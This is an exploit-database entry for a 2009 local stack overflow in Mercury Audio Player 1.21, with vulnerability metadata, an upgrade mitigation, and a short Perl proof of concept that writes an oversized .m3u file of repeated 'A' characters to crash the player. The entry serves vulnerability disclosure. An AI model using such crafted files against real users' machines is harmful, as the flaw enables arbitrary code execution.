header-logo
Suggest Exploit
vendor:
Mercury Audio Player
by:
SirGod
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Mercury Audio Player
Affected Version From: 1.21
Affected Version To: 1.21
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC

A stack overflow vulnerability exists in Mercury Audio Player 1.21 when processing specially crafted .M3U files. A local attacker can exploit this vulnerability to execute arbitrary code with the privileges of the user running the application.

Mitigation:

Upgrade to the latest version of Mercury Audio Player.
Source

Exploit-DB raw data:

###################################################################################
####      Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC      #####
####       Discovered by SirGod  -  www.mortal-team.net                       #####
###################################################################################
my $chars= "A" x 1104;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";

# milw0rm.com [2009-04-30]

Navigation

Suggest Exploit

Services By CQR